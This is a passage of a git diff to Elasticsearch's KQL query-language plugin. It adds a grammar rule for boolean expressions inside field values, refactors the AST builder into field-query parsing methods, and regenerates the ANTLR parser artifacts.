b/x-pack/plugin/kql/src/main/antlr/KqlBase.g4 index 739fa5eb0c6eb..a11132d6bbc61 100644 --- a/x-pack/plugin/kql/src/main/antlr/KqlBase.g4 +++ b/x-pack/plugin/kql/src/main/antlr/KqlBase.g4 @@ -27,7 +27,7 @@ topLevelQuery query : query operator=(AND|OR) query #booleanQuery - | simpleQuery #defaultQuery + | simpleQuery #defaultQuery ; simpleQuery @@ -51,7 +51,7 @@ nestedQuery nestedSubQuery : nestedSubQuery operator=(AND|OR) nestedSubQuery #booleanNestedQuery - | nestedSimpleSubQuery #defaultNestedQuery + | nestedSimpleSubQuery #defaultNestedQuery ; nestedSimpleSubQuery @@ -89,21 +89,27 @@ existsQuery fieldQuery : fieldName COLON fieldQueryValue - | fieldName COLON LEFT_PARENTHESIS fieldQueryValue RIGHT_PARENTHESIS ; fieldLessQuery : fieldQueryValue - | LEFT_PARENTHESIS fieldQueryValue RIGHT_PARENTHESIS ; fieldQueryValue - : (AND|OR|NOT)? (UNQUOTED_LITERAL|WILDCARD)+ (NOT|AND|OR)? - | (AND|OR) (AND|OR|NOT)? - | NOT (AND|OR)? + : (UNQUOTED_LITERAL|WILDCARD)+ + | (UNQUOTED_LITERAL|WILDCARD)? (OR|AND|NOT)+ + | (AND|OR)+ (UNQUOTED_LITERAL|WILDCARD)? | QUOTED_STRING + | operator=NOT (fieldQueryValue)? + | LEFT_PARENTHESIS booleanFieldQueryValue RIGHT_PARENTHESIS ; +booleanFieldQueryValue + : booleanFieldQueryValue operator=(AND|OR) fieldQueryValue + | LEFT_PARENTHESIS booleanFieldQueryValue RIGHT_PARENTHESIS + | fieldQueryValue + ; + fieldName : value=UNQUOTED_LITERAL | value=QUOTED_STRING diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlAstBuilder.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlAstBuilder.java index 2d810a33190ca..b26ac401a0746 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlAstBuilder.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlAstBuilder.java @@ -25,6 +25,7 @@ import java.util.Set; import java.util.function.BiConsumer; import java.util.function.BiFunction; +import java.util.function.Consumer; import static org.elasticsearch.common.logging.LoggerMessageFormat.format; import static org.elasticsearch.xpack.kql.parser.KqlParsingContext.isDateField; @@ -207,38 +208,76 @@ public QueryBuilder visitFieldLessQuery(KqlBaseParser.FieldLessQueryContext ctx) @Override public QueryBuilder visitFieldQuery(KqlBaseParser.FieldQueryContext ctx) { + return parseFieldQuery(ctx.fieldName(), ctx.fieldQueryValue()); + } - BoolQueryBuilder boolQueryBuilder = QueryBuilders.boolQuery().minimumShouldMatch(1); - String queryText = extractText(ctx.fieldQueryValue()); - boolean hasWildcard = hasWildcard(ctx.fieldQueryValue()); + public QueryBuilder parseBooleanFieldQuery( + KqlBaseParser.FieldNameContext fieldNameCtx, + KqlBaseParser.BooleanFieldQueryValueContext booleanFieldQueryValueCtx + ) { + if (booleanFieldQueryValueCtx.operator != null) { + BoolQueryBuilder boolQueryBuilder = QueryBuilders.boolQuery(); + + Token operator = booleanFieldQueryValueCtx.operator; + Consumer boolClauseConsumer = operator.getType() == KqlBaseParser.AND + ? boolQueryBuilder::must + : boolQueryBuilder::should; + boolClauseConsumer.accept(parseBooleanFieldQuery(fieldNameCtx, booleanFieldQueryValueCtx.booleanFieldQueryValue())); + boolClauseConsumer.accept(parseFieldQuery(fieldNameCtx, booleanFieldQueryValueCtx.fieldQueryValue())); + + return operator.getType() == KqlBaseParser.AND + ? rewriteConjunctionQuery(boolQueryBuilder) + : rewriteDisjunctionQuery(boolQueryBuilder); + } else if (booleanFieldQueryValueCtx.booleanFieldQueryValue() != null) { + return parseBooleanFieldQuery(fieldNameCtx, booleanFieldQueryValueCtx.booleanFieldQueryValue()); + } else { + assert booleanFieldQueryValueCtx.fieldQueryValue() != null; + return parseFieldQuery(fieldNameCtx, booleanFieldQueryValueCtx.fieldQueryValue()); + } + } - withFields(ctx.fieldName(), (fieldName, mappedFieldType) -> { - QueryBuilder fieldQuery = null; - - if (hasWildcard && isKeywordField(mappedFieldType)) { - fieldQuery = QueryBuilders.wildcardQuery(fieldName, queryText).caseInsensitive(kqlParsingContext.caseInsensitive()); - } else if (hasWildcard) { - fieldQuery = QueryBuilders.queryStringQuery(escapeLuceneQueryString(queryText, true)).field(fieldName); - } else if (isDateField(mappedFieldType)) { - RangeQueryBuilder rangeFieldQuery = QueryBuilders.rangeQuery(fieldName).gte(queryText).lte(queryText); - if (kqlParsingContext.timeZone() != null) { - rangeFieldQuery.timeZone(kqlParsingContext.timeZone().getId()); + public QueryBuilder parseFieldQuery( + KqlBaseParser.FieldNameContext fieldNameCtx, + KqlBaseParser.FieldQueryValueContext fieldQueryValueCtx + ) { + if (fieldQueryValueCtx.operator != null) { + assert fieldQueryValueCtx.fieldQueryValue() != null; + return QueryBuilders.boolQuery().mustNot(parseFieldQuery(fieldNameCtx, fieldQueryValueCtx.fieldQueryValue())); + } else if (fieldQueryValueCtx.booleanFieldQueryValue() != null) { + return parseBooleanFieldQuery(fieldNameCtx, fieldQueryValueCtx.booleanFieldQueryValue()); + } else { + BoolQueryBuilder boolQueryBuilder = QueryBuilders.boolQuery(); + String queryText = extractText(fieldQueryValueCtx); + boolean hasWildcard = hasWildcard(fieldQueryValueCtx); + + withFields(fieldNameCtx, (fieldName, mappedFieldType) -> { + QueryBuilder fieldQuery; + + if (hasWildcard && isKeywordField(mappedFieldType)) { + fieldQuery = QueryBuilders.wildcardQuery(fieldName, queryText).caseInsensitive(kqlParsingContext.caseInsensitive()); + } else if (hasWildcard) { + fieldQuery = QueryBuilders.queryStringQuery(escapeLuceneQueryString(queryText, true)).field(fieldName); + } else if (isDateField(mappedFieldType)) { + RangeQueryBuilder rangeFieldQuery = QueryBuilders.rangeQuery(fieldName).gte(queryText).lte(queryText); + if (kqlParsingContext.timeZone() != null) { + rangeFieldQuery.timeZone(kqlParsingContext.timeZone().getId()); + } + fieldQuery = rangeFieldQuery; + } else if (isKeywordField(mappedFieldType)) { + fieldQuery = QueryBuilders.termQuery(fieldName, queryText).caseInsensitive(kqlParsingContext.caseInsensitive()); + } else if (fieldQueryValueCtx.QUOTED_STRING() != null) { + fieldQuery = QueryBuilders.matchPhraseQuery(fieldName, queryText); + } else { + fieldQuery = QueryBuilders.matchQuery(fieldName, queryText); } - fieldQuery = rangeFieldQuery; - } else if (isKeywordField(mappedFieldType)) { - fieldQuery = QueryBuilders.termQuery(fieldName, queryText).caseInsensitive(kqlParsingContext.caseInsensitive()); - } else if (ctx.fieldQueryValue().QUOTED_STRING() != null) { - fieldQuery = QueryBuilders.matchPhraseQuery(fieldName, queryText); - } else { - fieldQuery = QueryBuilders.matchQuery(fieldName, queryText); - } - if (fieldQuery != null) { - boolQueryBuilder.should(wrapWithNestedQuery(fieldName, fieldQuery)); - } - }); + if (fieldQuery != null) { + boolQueryBuilder.should(wrapWithNestedQuery(fieldName, fieldQuery)); + } + }); - return rewriteDisjunctionQuery(boolQueryBuilder); + return rewriteDisjunctionQuery(boolQueryBuilder); + } } private static boolean isAndQuery(ParserRuleContext ctx) { @@ -269,9 +308,7 @@ private void withFields(KqlBaseParser.FieldNameContext ctx, BiConsumer { MappedFieldType fieldType = kqlParsingContext.fieldType(fieldName); diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBase.interp b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBase.interp index 7a1d446fd72c4..7528bbc64724f 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBase.interp +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBase.interp @@ -53,8 +53,9 @@ existsQuery fieldQuery fieldLessQuery fieldQueryValue +booleanFieldQueryValue fieldName atn: -[4, 1, 16, 166, 2, 0, 7, 0, 2, 1, 7, 1, 2, 2, 7, 2, 2, 3, 7, 3, 2, 4, 7, 4, 2, 5, 7, 5, 2, 6, 7, 6, 2, 7, 7, 7, 2, 8, 7, 8, 2, 9, 7, 9, 2, 10, 7, 10, 2, 11, 7, 11, 2, 12, 7, 12, 2, 13, 7, 13, 2, 14, 7, 14, 2, 15, 7, 15, 2, 16, 7, 16, 1, 0, 3, 0, 36, 8, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5, 1, 46, 8, 1, 10, 1, 12, 1, 49, 9, 1, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 3, 2, 59, 8, 2, 1, 3, 1, 3, 1, 3, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 5, 5, 76, 8, 5, 10, 5, 12, 5, 79, 9, 5, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 3, 6, 88, 8, 6, 1, 7, 1, 7, 1, 7, 1, 7, 1, 8, 1, 8, 3, 8, 96, 8, 8, 1, 8, 1, 8, 1, 9, 1, 9, 1, 9, 1, 9, 1, 10, 1, 10, 1, 10, 1, 10, 1, 11, 4, 11, 109, 8, 11, 11, 11, 12, 11, 110, 1, 11, 3, 11, 114, 8, 11, 1, 12, 1, 12, 1, 12, 1, 12, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 3, 13, 130, 8, 13, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 3, 14, 137, 8, 14, 1, 15, 3, 15, 140, 8, 15, 1, 15, 4, 15, 143, 8, 15, 11, 15, 12, 15, 144, 1, 15, 3, 15, 148, 8, 15, 1, 15, 1, 15, 3, 15, 152, 8, 15, 1, 15, 1, 15, 3, 15, 156, 8, 15, 1, 15, 3, 15, 159, 8, 15, 1, 16, 1, 16, 1, 16, 3, 16, 164, 8, 16, 1, 16, 0, 2, 2, 10, 17, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 0, 4, 1, 0, 2, 3, 1, 0, 6, 9, 2, 0, 14, 14, 16, 16, 1, 0, 2, 4, 179, 0, 35, 1, 0, 0, 0, 2, 39, 1, 0, 0, 0, 4, 58, 1, 0, 0, 0, 6, 60, 1, 0, 0, 0, 8, 63, 1, 0, 0, 0, 10, 69, 1, 0, 0, 0, 12, 87, 1, 0, 0, 0, 14, 89, 1, 0, 0, 0, 16, 95, 1, 0, 0, 0, 18, 99, 1, 0, 0, 0, 20, 103, 1, 0, 0, 0, 22, 113, 1, 0, 0, 0, 24, 115, 1, 0, 0, 0, 26, 129, 1, 0, 0, 0, 28, 136, 1, 0, 0, 0, 30, 158, 1, 0, 0, 0, 32, 163, 1, 0, 0, 0, 34, 36, 3, 2, 1, 0, 35, 34, 1, 0, 0, 0, 35, 36, 1, 0, 0, 0, 36, 37, 1, 0, 0, 0, 37, 38, 5, 0, 0, 1, 38, 1, 1, 0, 0, 0, 39, 40, 6, 1, -1, 0, 40, 41, 3, 4, 2, 0, 41, 47, 1, 0, 0, 0, 42, 43, 10, 2, 0, 0, 43, 44, 7, 0, 0, 0, 44, 46, 3, 2, 1, 2, 45, 42, 1, 0, 0, 0, 46, 49, 1, 0, 0, 0, 47, 45, 1, 0, 0, 0, 47, 48, 1, 0, 0, 0, 48, 3, 1, 0, 0, 0, 49, 47, 1, 0, 0, 0, 50, 59, 3, 6, 3, 0, 51, 59, 3, 8, 4, 0, 52, 59, 3, 18, 9, 0, 53, 59, 3, 16, 8, 0, 54, 59, 3, 24, 12, 0, 55, 59, 3, 20, 10, 0, 56, 59, 3, 26, 13, 0, 57, 59, 3, 28, 14, 0, 58, 50, 1, 0, 0, 0, 58, 51, 1, 0, 0, 0, 58, 52, 1, 0, 0, 0, 58, 53, 1, 0, 0, 0, 58, 54, 1, 0, 0, 0, 58, 55, 1, 0, 0, 0, 58, 56, 1, 0, 0, 0, 58, 57, 1, 0, 0, 0, 59, 5, 1, 0, 0, 0, 60, 61, 5, 4, 0, 0, 61, 62, 3, 4, 2, 0, 62, 7, 1, 0, 0, 0, 63, 64, 3, 32, 16, 0, 64, 65, 5, 5, 0, 0, 65, 66, 5, 12, 0, 0, 66, 67, 3, 10, 5, 0, 67, 68, 5, 13, 0, 0, 68, 9, 1, 0, 0, 0, 69, 70, 6, 5, -1, 0, 70, 71, 3, 12, 6, 0, 71, 77, 1, 0, 0, 0, 72, 73, 10, 2, 0, 0, 73, 74, 7, 0, 0, 0, 74, 76, 3, 10, 5, 2, 75, 72, 1, 0, 0, 0, 76, 79, 1, 0, 0, 0, 77, 75, 1, 0, 0, 0, 77, 78, 1, 0, 0, 0, 78, 11, 1, 0, 0, 0, 79, 77, 1, 0, 0, 0, 80, 88, 3, 6, 3, 0, 81, 88, 3, 8, 4, 0, 82, 88, 3, 16, 8, 0, 83, 88, 3, 14, 7, 0, 84, 88, 3, 24, 12, 0, 85, 88, 3, 20, 10, 0, 86, 88, 3, 26, 13, 0, 87, 80, 1, 0, 0, 0, 87, 81, 1, 0, 0, 0, 87, 82, 1, 0, 0, 0, 87, 83, 1, 0, 0, 0, 87, 84, 1, 0, 0, 0, 87, 85, 1, 0, 0, 0, 87, 86, 1, 0, 0, 0, 88, 13, 1, 0, 0, 0, 89, 90, 5, 10, 0, 0, 90, 91, 3, 10, 5, 0, 91, 92, 5, 11, 0, 0, 92, 15, 1, 0, 0, 0, 93, 94, 5, 16, 0, 0, 94, 96, 5, 5, 0, 0, 95, 93, 1, 0, 0, 0, 95, 96, 1, 0, 0, 0, 96, 97, 1, 0, 0, 0, 97, 98, 5, 16, 0, 0, 98, 17, 1, 0, 0, 0, 99, 100, 5, 10, 0, 0, 100, 101, 3, 2, 1, 0, 101, 102, 5, 11, 0, 0, 102, 19, 1, 0, 0, 0, 103, 104, 3, 32, 16, 0, 104, 105, 7, 1, 0, 0, 105, 106, 3, 22, 11, 0, 106, 21, 1, 0, 0, 0, 107, 109, 7, 2, 0, 0, 108, 107, 1, 0, 0, 0, 109, 110, 1, 0, 0, 0, 110, 108, 1, 0, 0, 0, 110, 111, 1, 0, 0, 0, 111, 114, 1, 0, 0, 0, 112, 114, 5, 15, 0, 0, 113, 108, 1, 0, 0, 0, 113, 112, 1, 0, 0, 0, 114, 23, 1, 0, 0, 0, 115, 116, 3, 32, 16, 0, 116, 117, 5, 5, 0, 0, 117, 118, 5, 16, 0, 0, 118, 25, 1, 0, 0, 0, 119, 120, 3, 32, 16, 0, 120, 121, 5, 5, 0, 0, 121, 122, 3, 30, 15, 0, 122, 130, 1, 0, 0, 0, 123, 124, 3, 32, 16, 0, 124, 125, 5, 5, 0, 0, 125, 126, 5, 10, 0, 0, 126, 127, 3, 30, 15, 0, 127, 128, 5, 11, 0, 0, 128, 130, 1, 0, 0, 0, 129, 119, 1, 0, 0, 0, 129, 123, 1, 0, 0, 0, 130, 27, 1, 0, 0, 0, 131, 137, 3, 30, 15, 0, 132, 133, 5, 10, 0, 0, 133, 134, 3, 30, 15, 0, 134, 135, 5, 11, 0, 0, 135, 137, 1, 0, 0, 0, 136, 131, 1, 0, 0, 0, 136, 132, 1, 0, 0, 0, 137, 29, 1, 0, 0, 0, 138, 140, 7, 3, 0, 0, 139, 138, 1, 0, 0, 0, 139, 140, 1, 0, 0, 0, 140, 142, 1, 0, 0, 0, 141, 143, 7, 2, 0, 0, 142, 141, 1, 0, 0, 0, 143, 144, 1, 0, 0, 0, 144, 142, 1, 0, 0, 0, 144, 145, 1, 0, 0, 0, 145, 147, 1, 0, 0, 0, 146, 148, 7, 3, 0, 0, 147, 146, 1, 0, 0, 0, 147, 148, 1, 0, 0, 0, 148, 159, 1, 0, 0, 0, 149, 151, 7, 0, 0, 0, 150, 152, 7, 3, 0, 0, 151, 150, 1, 0, 0, 0, 151, 152, 1, 0, 0, 0, 152, 159, 1, 0, 0, 0, 153, 155, 5, 4, 0, 0, 154, 156, 7, 0, 0, 0, 155, 154, 1, 0, 0, 0, 155, 156, 1, 0, 0, 0, 156, 159, 1, 0, 0, 0, 157, 159, 5, 15, 0, 0, 158, 139, 1, 0, 0, 0, 158, 149, 1, 0, 0, 0, 158, 153, 1, 0, 0, 0, 158, 157, 1, 0, 0, 0, 159, 31, 1, 0, 0, 0, 160, 164, 5, 14, 0, 0, 161, 164, 5, 15, 0, 0, 162, 164, 5, 16, 0, 0, 163, 160, 1, 0, 0, 0, 163, 161, 1, 0, 0, 0, 163, 162, 1, 0, 0, 0, 164, 33, 1, 0, 0, 0, 17, 35, 47, 58, 77, 87, 95, 110, 113, 129, 136, 139, 144, 147, 151, 155, 158, 163] +[4, 1, 16, 181, 2, 0, 7, 0, 2, 1, 7, 1, 2, 2, 7, 2, 2, 3, 7, 3, 2, 4, 7, 4, 2, 5, 7, 5, 2, 6, 7, 6, 2, 7, 7, 7, 2, 8, 7, 8, 2, 9, 7, 9, 2, 10, 7, 10, 2, 11, 7, 11, 2, 12, 7, 12, 2, 13, 7, 13, 2, 14, 7, 14, 2, 15, 7, 15, 2, 16, 7, 16, 2, 17, 7, 17, 1, 0, 3, 0, 38, 8, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5, 1, 48, 8, 1, 10, 1, 12, 1, 51, 9, 1, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 3, 2, 61, 8, 2, 1, 3, 1, 3, 1, 3, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 5, 5, 78, 8, 5, 10, 5, 12, 5, 81, 9, 5, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 3, 6, 90, 8, 6, 1, 7, 1, 7, 1, 7, 1, 7, 1, 8, 1, 8, 3, 8, 98, 8, 8, 1, 8, 1, 8, 1, 9, 1, 9, 1, 9, 1, 9, 1, 10, 1, 10, 1, 10, 1, 10, 1, 11, 4, 11, 111, 8, 11, 11, 11, 12, 11, 112, 1, 11, 3, 11, 116, 8, 11, 1, 12, 1, 12, 1, 12, 1, 12, 1, 13, 1, 13, 1, 13, 1, 13, 1, 14, 1, 14, 1, 15, 4, 15, 129, 8, 15, 11, 15, 12, 15, 130, 1, 15, 3, 15, 134, 8, 15, 1, 15, 4, 15, 137, 8, 15, 11, 15, 12, 15, 138, 1, 15, 4, 15, 142, 8, 15, 11, 15, 12, 15, 143, 1, 15, 3, 15, 147, 8, 15, 1, 15, 1, 15, 1, 15, 3, 15, 152, 8, 15, 1, 15, 1, 15, 1, 15, 1, 15, 3, 15, 158, 8, 15, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 3, 16, 166, 8, 16, 1, 16, 1, 16, 1, 16, 5, 16, 171, 8, 16, 10, 16, 12, 16, 174, 9, 16, 1, 17, 1, 17, 1, 17, 3, 17, 179, 8, 17, 1, 17, 0, 3, 2, 10, 32, 18, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 0, 4, 1, 0, 2, 3, 1, 0, 6, 9, 2, 0, 14, 14, 16, 16, 1, 0, 2, 4, 196, 0, 37, 1, 0, 0, 0, 2, 41, 1, 0, 0, 0, 4, 60, 1, 0, 0, 0, 6, 62, 1, 0, 0, 0, 8, 65, 1, 0, 0, 0, 10, 71, 1, 0, 0, 0, 12, 89, 1, 0, 0, 0, 14, 91, 1, 0, 0, 0, 16, 97, 1, 0, 0, 0, 18, 101, 1, 0, 0, 0, 20, 105, 1, 0, 0, 0, 22, 115, 1, 0, 0, 0, 24, 117, 1, 0, 0, 0, 26, 121, 1, 0, 0, 0, 28, 125, 1, 0, 0, 0, 30, 157, 1, 0, 0, 0, 32, 165, 1, 0, 0, 0, 34, 178, 1, 0, 0, 0, 36, 38, 3, 2, 1, 0, 37, 36, 1, 0, 0, 0, 37, 38, 1, 0, 0, 0, 38, 39, 1, 0, 0, 0, 39, 40, 5, 0, 0, 1, 40, 1, 1, 0, 0, 0, 41, 42, 6, 1, -1, 0, 42, 43, 3, 4, 2, 0, 43, 49, 1, 0, 0, 0, 44, 45, 10, 2, 0, 0, 45, 46, 7, 0, 0, 0, 46, 48, 3, 2, 1, 2, 47, 44, 1, 0, 0, 0, 48, 51, 1, 0, 0, 0, 49, 47, 1, 0, 0, 0, 49, 50, 1, 0, 0, 0, 50, 3, 1, 0, 0, 0, 51, 49, 1, 0, 0, 0, 52, 61, 3, 6, 3, 0, 53, 61, 3, 8, 4, 0, 54, 61, 3, 18, 9, 0, 55, 61, 3, 16, 8, 0, 56, 61, 3, 24, 12, 0, 57, 61, 3, 20, 10, 0, 58, 61, 3, 26, 13, 0, 59, 61, 3, 28, 14, 0, 60, 52, 1, 0, 0, 0, 60, 53, 1, 0, 0, 0, 60, 54, 1, 0, 0, 0, 60, 55, 1, 0, 0, 0, 60, 56, 1, 0, 0, 0, 60, 57, 1, 0, 0, 0, 60, 58, 1, 0, 0, 0, 60, 59, 1, 0, 0, 0, 61, 5, 1, 0, 0, 0, 62, 63, 5, 4, 0, 0, 63, 64, 3, 4, 2, 0, 64, 7, 1, 0, 0, 0, 65, 66, 3, 34, 17, 0, 66, 67, 5, 5, 0, 0, 67, 68, 5, 12, 0, 0, 68, 69, 3, 10, 5, 0, 69, 70, 5, 13, 0, 0, 70, 9, 1, 0, 0, 0, 71, 72, 6, 5, -1, 0, 72, 73, 3, 12, 6, 0, 73, 79, 1, 0, 0, 0, 74, 75, 10, 2, 0, 0, 75, 76, 7, 0, 0, 0, 76, 78, 3, 10, 5, 2, 77, 74, 1, 0, 0, 0, 78, 81, 1, 0, 0, 0, 79, 77, 1, 0, 0, 0, 79, 80, 1, 0, 0, 0, 80, 11, 1, 0, 0, 0, 81, 79, 1, 0, 0, 0, 82, 90, 3, 6, 3, 0, 83, 90, 3, 8, 4, 0, 84, 90, 3, 16, 8, 0, 85, 90, 3, 14, 7, 0, 86, 90, 3, 24, 12, 0, 87, 90, 3, 20, 10, 0, 88, 90, 3, 26, 13, 0, 89, 82, 1, 0, 0, 0, 89, 83, 1, 0, 0, 0, 89, 84, 1, 0, 0, 0, 89, 85, 1, 0, 0, 0, 89, 86, 1, 0, 0, 0, 89, 87, 1, 0, 0, 0, 89, 88, 1, 0, 0, 0, 90, 13, 1, 0, 0, 0, 91, 92, 5, 10, 0, 0, 92, 93, 3, 10, 5, 0, 93, 94, 5, 11, 0, 0, 94, 15, 1, 0, 0, 0, 95, 96, 5, 16, 0, 0, 96, 98, 5, 5, 0, 0, 97, 95, 1, 0, 0, 0, 97, 98, 1, 0, 0, 0, 98, 99, 1, 0, 0, 0, 99, 100, 5, 16, 0, 0, 100, 17, 1, 0, 0, 0, 101, 102, 5, 10, 0, 0, 102, 103, 3, 2, 1, 0, 103, 104, 5, 11, 0, 0, 104, 19, 1, 0, 0, 0, 105, 106, 3, 34, 17, 0, 106, 107, 7, 1, 0, 0, 107, 108, 3, 22, 11, 0, 108, 21, 1, 0, 0, 0, 109, 111, 7, 2, 0, 0, 110, 109, 1, 0, 0, 0, 111, 112, 1, 0, 0, 0, 112, 110, 1, 0, 0, 0, 112, 113, 1, 0, 0, 0, 113, 116, 1, 0, 0, 0, 114, 116, 5, 15, 0, 0, 115, 110, 1, 0, 0, 0, 115, 114, 1, 0, 0, 0, 116, 23, 1, 0, 0, 0, 117, 118, 3, 34, 17, 0, 118, 119, 5, 5, 0, 0, 119, 120, 5, 16, 0, 0, 120, 25, 1, 0, 0, 0, 121, 122, 3, 34, 17, 0, 122, 123, 5, 5, 0, 0, 123, 124, 3, 30, 15, 0, 124, 27, 1, 0, 0, 0, 125, 126, 3, 30, 15, 0, 126, 29, 1, 0, 0, 0, 127, 129, 7, 2, 0, 0, 128, 127, 1, 0, 0, 0, 129, 130, 1, 0, 0, 0, 130, 128, 1, 0, 0, 0, 130, 131, 1, 0, 0, 0, 131, 158, 1, 0, 0, 0, 132, 134, 7, 2, 0, 0, 133, 132, 1, 0, 0, 0, 133, 134, 1, 0, 0, 0, 134, 136, 1, 0, 0, 0, 135, 137, 7, 3, 0, 0, 136, 135, 1, 0, 0, 0, 137, 138, 1, 0, 0, 0, 138, 136, 1, 0, 0, 0, 138, 139, 1, 0, 0, 0, 139, 158, 1, 0, 0, 0, 140, 142, 7, 0, 0, 0, 141, 140, 1, 0, 0, 0, 142, 143, 1, 0, 0, 0, 143, 141, 1, 0, 0, 0, 143, 144, 1, 0, 0, 0, 144, 146, 1, 0, 0, 0, 145, 147, 7, 2, 0, 0, 146, 145, 1, 0, 0, 0, 146, 147, 1, 0, 0, 0, 147, 158, 1, 0, 0, 0, 148, 158, 5, 15, 0, 0, 149, 151, 5, 4, 0, 0, 150, 152, 3, 30, 15, 0, 151, 150, 1, 0, 0, 0, 151, 152, 1, 0, 0, 0, 152, 158, 1, 0, 0, 0, 153, 154, 5, 10, 0, 0, 154, 155, 3, 32, 16, 0, 155, 156, 5, 11, 0, 0, 156, 158, 1, 0, 0, 0, 157, 128, 1, 0, 0, 0, 157, 133, 1, 0, 0, 0, 157, 141, 1, 0, 0, 0, 157, 148, 1, 0, 0, 0, 157, 149, 1, 0, 0, 0, 157, 153, 1, 0, 0, 0, 158, 31, 1, 0, 0, 0, 159, 160, 6, 16, -1, 0, 160, 161, 5, 10, 0, 0, 161, 162, 3, 32, 16, 0, 162, 163, 5, 11, 0, 0, 163, 166, 1, 0, 0, 0, 164, 166, 3, 30, 15, 0, 165, 159, 1, 0, 0, 0, 165, 164, 1, 0, 0, 0, 166, 172, 1, 0, 0, 0, 167, 168, 10, 3, 0, 0, 168, 169, 7, 0, 0, 0, 169, 171, 3, 30, 15, 0, 170, 167, 1, 0, 0, 0, 171, 174, 1, 0, 0, 0, 172, 170, 1, 0, 0, 0, 172, 173, 1, 0, 0, 0, 173, 33, 1, 0, 0, 0, 174, 172, 1, 0, 0, 0, 175, 179, 5, 14, 0, 0, 176, 179, 5, 15, 0, 0, 177, 179, 5, 16, 0, 0, 178, 175, 1, 0, 0, 0, 178, 176, 1, 0, 0, 0, 178, 177, 1, 0, 0, 0, 179, 35, 1, 0, 0, 0, 18, 37, 49, 60, 79, 89, 97, 112, 115, 130, 133, 138, 143, 146, 151, 157, 165, 172, 178] \ No newline at end of file diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseListener.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseListener.java index c3fc1281b6fd9..f29a1ba763457 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseListener.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseListener.java @@ -236,6 +236,18 @@ class KqlBaseBaseListener implements KqlBaseListener { *

The default implementation does nothing.

*/ @Override public void exitFieldQueryValue(KqlBaseParser.FieldQueryValueContext ctx) { } + /** + * {@inheritDoc} + * + *

The default implementation does nothing.

+ */ + @Override public void enterBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx) { } + /** + * {@inheritDoc} + * + *

The default implementation does nothing.

+ */ + @Override public void exitBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx) { } /** * {@inheritDoc} * diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseVisitor.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseVisitor.java index 84c882c2e2bcf..0ea328f02a8e8 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseVisitor.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseVisitor.java @@ -146,6 +146,13 @@ class KqlBaseBaseVisitor extends AbstractParseTreeVisitor implements KqlBa * {@link #visitChildren} on {@code ctx}.

*/ @Override public T visitFieldQueryValue(KqlBaseParser.FieldQueryValueContext ctx) { return visitChildren(ctx); } + /** + * {@inheritDoc} + * + *

The default implementation returns the result of calling + * {@link #visitChildren} on {@code ctx}.

+ */ + @Override public T visitBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx) { return visitChildren(ctx); } /** * {@inheritDoc} * diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseListener.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseListener.java index a44ecf1ecad23..6966553036d88 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseListener.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseListener.java @@ -203,6 +203,16 @@ interface KqlBaseListener extends ParseTreeListener { * @param ctx the parse tree */ void exitFieldQueryValue(KqlBaseParser.FieldQueryValueContext ctx); + /** + * Enter a parse tree produced by {@link KqlBaseParser#booleanFieldQueryValue}. + * @param ctx the parse tree + */ + void enterBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx); + /** + * Exit a parse tree produced by {@link KqlBaseParser#booleanFieldQueryValue}. + * @param ctx the parse tree + */ + void exitBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx); /** * Enter a parse tree produced by {@link 